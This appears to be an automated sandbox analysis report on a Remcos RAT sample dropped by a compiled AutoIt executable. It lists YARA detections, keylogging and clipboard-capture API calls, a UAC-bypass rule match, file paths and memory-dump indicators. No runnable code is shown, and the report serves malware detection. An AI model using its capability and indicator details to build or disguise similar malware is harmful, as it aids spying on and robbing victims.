                    Source: Milburr.exe, 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000002_2_004099E4
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_004159C6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00734164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00734164
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BC3F66
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BB001C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0074CABC
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041BB77 SystemParametersInfoW,2_2_0041BB77
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041BB77 SystemParametersInfoW,5_2_0041BB77

                    System Summary

                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: This is a third-party compiled AutoIt script.0_2_00B53B3A
                    Source: l1QC9H0SNR.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ff0710b1-8
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_77596639-c
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: This is a third-party compiled AutoIt script.2_2_006C3B3A
                    Source: Milburr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_832eee1c-1
                    Source: Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5d257fcd-a
                    Source: Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5fadeae3-d
                    Source: Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_68826bf8-7
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_460592e9-d
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_26033025-9
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00B53633
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00BDC1AC
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00BDC498
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00BDC5FE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC57D SendMessageW,NtdllDialogWndProc_W,0_2_00BDC57D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC8BE NtdllDialogWndProc_W,0_2_00BDC8BE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC88F NtdllDialogWndProc_W,0_2_00BDC88F
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC860 NtdllDialogWndProc_W,0_2_00BDC860
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC93E ClientToScreen,NtdllDialogWndProc_W,0_2_00BDC93E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC909 NtdllDialogWndProc_W,0_2_00BDC909
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCA7C GetWindowLongW,NtdllDialogWndProc_W,0_2_00BDCA7C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00B51290
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W, 0_2_00B51287
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDD3B8 NtdllDialogWndProc_W, 0_2_00BDD3B8
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W, 0_2_00BDD43E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B516B5 NtdllDialogWndProc_W, 0_2_00B516B5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B516DE GetParent,NtdllDialogWndProc_W, 0_2_00B516DE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B5167D NtdllDialogWndProc_W, 0_2_00B5167D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDD78C NtdllDialogWndProc_W, 0_2_00BDD78C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B5189B NtdllDialogWndProc_W, 0_2_00B5189B
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDBC5D NtdllDialogWndProc_W,CallWindowProcW, 0_2_00BDBC5D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, 0_2_00BDBF8C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BDBF30 NtdllDialogWndProc_W, 0_2_00BDBF30
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle, 2_2_0041ACC1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle, 2_2_0041ACED
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow, 2_2_006C3633
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W, 2_2_0074C1AC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W, 2_2_0074C498
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C57D SendMessageW,NtdllDialogWndProc_W, 2_2_0074C57D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W, 2_2_0074C5FE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C860 NtdllDialogWndProc_W, 2_2_0074C860
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C8BE NtdllDialogWndProc_W, 2_2_0074C8BE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C88F NtdllDialogWndProc_W, 2_2_0074C88F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C93E ClientToScreen,NtdllDialogWndProc_W, 2_2_0074C93E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074C909 NtdllDialogWndProc_W, 2_2_0074C909
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074CA7C GetWindowLongW,NtdllDialogWndProc_W, 2_2_0074CA7C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_0074CABC
